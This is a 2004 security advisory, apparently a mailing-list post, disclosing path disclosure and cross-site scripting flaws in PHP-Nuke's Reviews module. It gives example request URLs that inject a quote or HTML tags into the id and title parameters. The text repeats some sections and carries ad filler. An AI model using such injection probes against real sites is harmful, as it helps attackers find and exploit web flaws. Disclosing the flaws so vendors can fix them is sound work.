Warning: date(): Windows does not support dates prior to midnight
(00:00:00),
January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on
line 527
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PHP-NUKE website for updates and official release details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho (at) peru (dot) com [email concealed]
_________________________________________________________________
Consigue aquí las mejores y mas recientes ofertas de trabajo en América
Latina y USA: http://latam.msn.com/empleos/
------------------------------------------------------------------------
-------------------------
:.: Multiple vulnerabilities PHP-Nuke :.:
PROGRAM: PHP-Nuke
HOMEPAGE: http://phpnuke.org/
VERSION: 6.x, 7.2, 7.3
BUG: Multiple vulnerabilities
DATE: 14/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho (at) peru (dot) com [email concealed]
------------------------------------------------------------------------
-------------------------
1.- Affected software description:
-----------------------------
Php-Nuke is a popular content management system, written in php by
Francisco Burzi.
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='Dark
Bicho
Warning: date(): Windows does not support dates prior to midnight
(00:00:00),
January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on
line 527
B. Cross-Site Scripting aka XSS:
:.: id :
*
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit
le=a
<input type=hidden name=id value='>
:.: title :
*
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit
le=a
:.: Examples:
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>
DarkBicho</h1&title=a
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit
le=<h1>DarkBicho</h1>
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PHP-NUKE website for updates and official release details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho (at) peru (dot) com [email concealed]
------------------------------------------------------------------------
-------------------------
___________ ____________
/ _____/ \ / \______ \_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
_________________________________________________________________
Consigue aquí las mejores y mas recientes ofertas de trabajo en América
Latina y USA: http://latam.msn.com/empleos/
[ reply ]